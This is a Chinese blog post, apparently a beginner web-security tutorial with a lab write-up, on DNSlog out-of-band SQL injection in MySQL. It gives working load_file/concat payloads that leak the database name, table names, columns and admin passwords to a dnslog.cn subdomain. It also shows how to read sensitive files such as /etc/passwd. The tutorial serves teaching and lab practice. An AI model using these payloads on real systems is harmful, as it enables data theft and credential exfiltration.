web安全入门(第五章-3)dns注入

最新推荐文章于 2024-03-18 00:36:47 发布
最新推荐文章于 2024-03-18 00:36:47 发布
阅读量325 收藏
点赞数
分类专栏: 安全入门 文章标签: mysql 数据库 php 后端 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/106491858
版权

一、DNSLOG的函数解析

1,基本
	DNS(协议  域名 -> IP转换)
	
	日志:基本上所有程序都会记录日志
	
	DNS	他实际上也是有日志的
	
	补充:问:DNSlog注入是不是在linx系统可不可以用SMB服务?  (全称是Server Message Block ,														           用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居由它实现。)
		  答:在linx里面默认不可以使用,因为linx没有这个服务
2,函数用法:
	select load_file(路径);			//这个函数用于读取文件内容,并返回输出
		例如:select load_file(c:/d/1.txt)
		
	路径可以是绝对也可以是相对,
	注意mysql执行的相对路径是	mysql/data/下  并不是mysql文件夹下
	
3,若load_file无法读取文件,去改一下设置:
		在mysql文件下my.ini的最下面加一行
		secure_file_priv=
	
	敏感文件:
		Linux 	/etc/passwd
		Win		C:/windows/win.ini
		
	知道需不需要更改配置,直接去试试读取敏感文件
		select load_file('c:/windows/win.ini');


4,UNC路径
	UNC:	简单的说,就是网络(主要是局域网)上共享的资源
	格式:
			\\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。
	如何共享:
			首先创建文件夹,右键共享,高级共享。在以上选项可选时依次执行。
	如何访问:
			在同网络中,输入\\ + 对方的ip或+对方的主机名即可访问对方共享的文件夹
	例如:
			jkl计算机的名为a123的共享文件夹,
				用UNC表示:
			\\jkl\a123
			
	我们熟知的命令行访问网上邻居,实际上应该称作UNC路径访问法

二、DNSLOG的使用场景

	本质上就是win上的一种服务,Linux上是没有的在某些无法直接利用漏洞获得回显的情况下,
	但是目标可以发起请求,这个时候就可以通过DNSlog把想获得的数据外带出来。
		    
	对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。
	所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据
		
	select load_file()	(读取文件)可以请求远程共享文件。
	比如:访问baidu.com,访问了域名,域名是由DNS服务器解析。
	
	免费域名平台:
	http://dnslog.cn/ 免费的dnslog平台 提供免费域名
	
	select load_file('//error.1806dl.dnslog.cn/ abc');
						域名=>dns解析=>记录某时某刻
						
	select load_file(concat('//'(select database()),'域名//abc')	(select database())是一个子查询,会查询当前库名,有括号优先执行
	select load_file('//root.xx.xxx.xxxx//abc');
	数据库去访问root.xx.xxx.xxxx的服务器下的共享文件夹abc。
	然后xxx.xxxx子域名的解析都是在某台服务器,然后他记录下来了有人请求访问root.xx.xxx.xxxx,然后在xxx这个平台上面显示出来。
	
	//开头代表是UNC路径

三、靶场作业

	判断注入点
	在url栏中输入id=1 没反应 输入 id and 1=1 发现访问被拦截  /123.txt?id=1%20and%20sleep(5) 发现有延迟,说明存在注入
	02nz91.dnslog.cn 是域名  	abc	域名下的文件夹
	查询库名	
	And load_file(concat(‘//’,(select database()),’.02nz91.dnslog.cn//abc’))   
		
	表名出现admin 说明第一个表名是admin	
	and load_file(concat('//',(select table_name from information_schema.tables where table_schema=database()limit 0,1),'.02nz91.dnslog.cn//abc')) 	
	出现第二个表 news
	and load_file(concat('//',(select table_name from information_schema.tables where table_schema=0x6d616e677a6875 limit 0,1),'.02nz91.dnslog.cn//abc')) 	
		
	字段名	 Limit 3,1/limit 2,1 /limit 1,1 出现全部字段
	and load_file(concat('//',(select column_name from information_schema.columns where table_name='admin' limit 3,1),'.02nz91.dnslog.cn//abc')) 	
		
	爆内容	
	and load_file(concat('//',(select password from admin limit 0,1),'.02nz91.dnslog.cn//abc'))
YINZHE_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dns注入
笔墨稠思
11-25 2225
Dns注入(windowns服务器(支持smb服务) mysql数据库) 在我们发送请求时,将域名转换为对应的ip 例如 https://baidu.com 他会将这个域名解析为后面这串数字 220.181.38.251,从而帮助我们找到百度的服务器 Dns注入的原理 在我们对这个域名进行请求,Dns对这个域名进行解析时,可能会在日志中记录请求方的ip和请求的目录,我们可以通过子查询,将我们想要的内容拼接到域名内,让load_file()去访问共享文件,此时,被访问的域名被记录,此时可以去查看Dns服务
web安全day5:DNS部署与安全
小梁的博客
12-05 2701
所有网站都是部署在网络中的具体某个服务器上的,我们通常在浏览器的地址栏中输入网站的网址来访问这个网站,网址的格式类似于www.xxxx.com,那么我们的浏览器是如何知道这个网址对应了网络中的哪一台服务器呢? 我们知道,在网络中,一般用ip地址来标识一台设备的位置,那么网址和ip之间一定有某种对应关系,才得以让我们不用记住复杂的ip地址而仅仅使用某个朗朗上口的网址就能访问到它。这个对应关系实际是就是网络中的dns服务器来帮助我们完成的。 今天我们就来了解以下DNS的前世今生,部署方式以及它遇到的安全问题
DNS注入
nobugnomoney的博客
09-11 1339
1.我们首先要知道什么是DNS: 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说得简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。 互联网中的地址是数字的IP地
深入探讨DNS数据包注入DNS中毒攻击检测 (C/C++代码实现)
chen1415886044的博客
12-24 1258
DNS数据包注入DNS中毒攻击是网络安全领域中两种重要的攻击方式。DNS数据包注入是一种攻击手段,通过向DNS服务器发送恶意数据包,以篡改其正常功能。而DNS中毒攻击则是一种针对DNS缓存的攻击,目的是通过向DNS服务器的缓存中添加恶意记录,从而使用户访问到错误的网站。
教程分享Web安全基础入门
03-17
Web安全基础入门是网络安全领域的重要组成部分,主要关注的是在Web应用程序和服务器中发现并防止潜在的安全威胁。这个教程旨在帮助初学者了解Web安全的基本概念,包括信息收集、漏洞检测以及渗透测试的基础知识。 1...
SQL注入攻击与防御(安全技术经典译丛)
02-19
第5章 SQL盲注利用  5.1 概述  5.2 寻找并确认SQL盲注  5.2.1 强制产生通用错误  5.2.2 注入带副作用的查询  5.2.3 拆分与平衡  5.2.4 常见的SQL盲注场景  5.2.5 SQL盲注技术  5.3 使用基于时间的...
info2222.zip 用python实现网络安全
03-27
5. 实战项目:参与或创建自己的安全扫描、Web应用安全测试等项目。 通过以上学习,初学者能够逐步掌握Python在网络安全领域的应用,为成为一名合格的安全工程师奠定坚实基础。在这个过程中,实践是检验学习效果的...
SQL注入攻击与防御
10-04
第5章 SQL盲注利用 171 5.1 概述 172 5.2 寻找并确认SQL盲注 173 5.2.1 强制产生通用错误 173 5.2.2 注入带副作用的查询 173 5.2.3 拆分与平衡 173 5.2.4 常见的SQL盲注场景 175 5.2.5 SQL盲注技术 176 5.3 使用基于...
SpringBoot - @TableName / @TableField / @TableId 注解使用详解
热门推荐
记录并分享
06-02 1万+
主要讲解@TableName / @TableField / @TableId 注解在实际工作中的使用。
DNSLog注入SQLmap工具使用
最新发布
2301_80034711的博客
03-18 1066
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLog。Sqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据库服务器的权限。
SQL注入(Dns注入)---zkaq
weixin_38237216的博客
04-11 1773
1.概念 1.DNS-log:DNS是解析域名的,log是日志记录,DNS-log是记录域名解析记录日志 2.使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 3.涉及的函数:LOAD_FILE():读取文件的函数—读取文件并返回文件内容为字符串 ​ a.配置文件中的参数secure_file_priv= ​ b.高版本mysql中会限制 ​ c.既然会被限制那有什么用呢?但是也会存在下面几种情况 有的版本会自动开启 有的网站需要
bat脚本双击执行
qq_35911118的博客
04-08 2824
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
dns缓存
qq_35543858的博客
01-25 754
查看dns缓存 ipconfig/displaydns 清除dns缓存 ipconfig/flushdns DNS缓存介绍 记录种类 A记录是指定域名对应的IP地址。 AAAA记录一个域名对应的IPv6地址 NS记录 是指定由哪个DNS服务器解析你的域名。 MX记录 是指邮件交换记录,记录了在当前网络下,存在的mail服务器 CNAME记录 是指别名记录,允许多个域名对应一个ip ...
DNS外带注入
weixin_52501704的博客
10-09 1484
DNS外带注入
小结--dns注入
weixin_30300523的博客
05-26 172
0x01 杂言 最近实在是太忙了,考试都排满了,晚上刚考完,补一下昨天的东西,一下dns注入。 我们知道在盲注的时候,要用脚本去跑,在测试的时候效率就不是很高,这时候用dns注入往往事半功倍 0x02 payload 这里直接贴一下payload LOAD_FILE(CONCAT(0x5C5C,(HEX(USER())),0x2E3563733076642E636579652E696F5C313...
电脑入门:第8章-互联网基础与上网实践
《电脑入门+上网实例与操作》图文课件的第8章深入讲解了如何在网上冲浪的初体验。本章分为两个主要部分:上网初准备和实际操作。 首先,8.1节是“上网初准备”,这部分介绍互联网的基本概念。Internet,作为全球...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值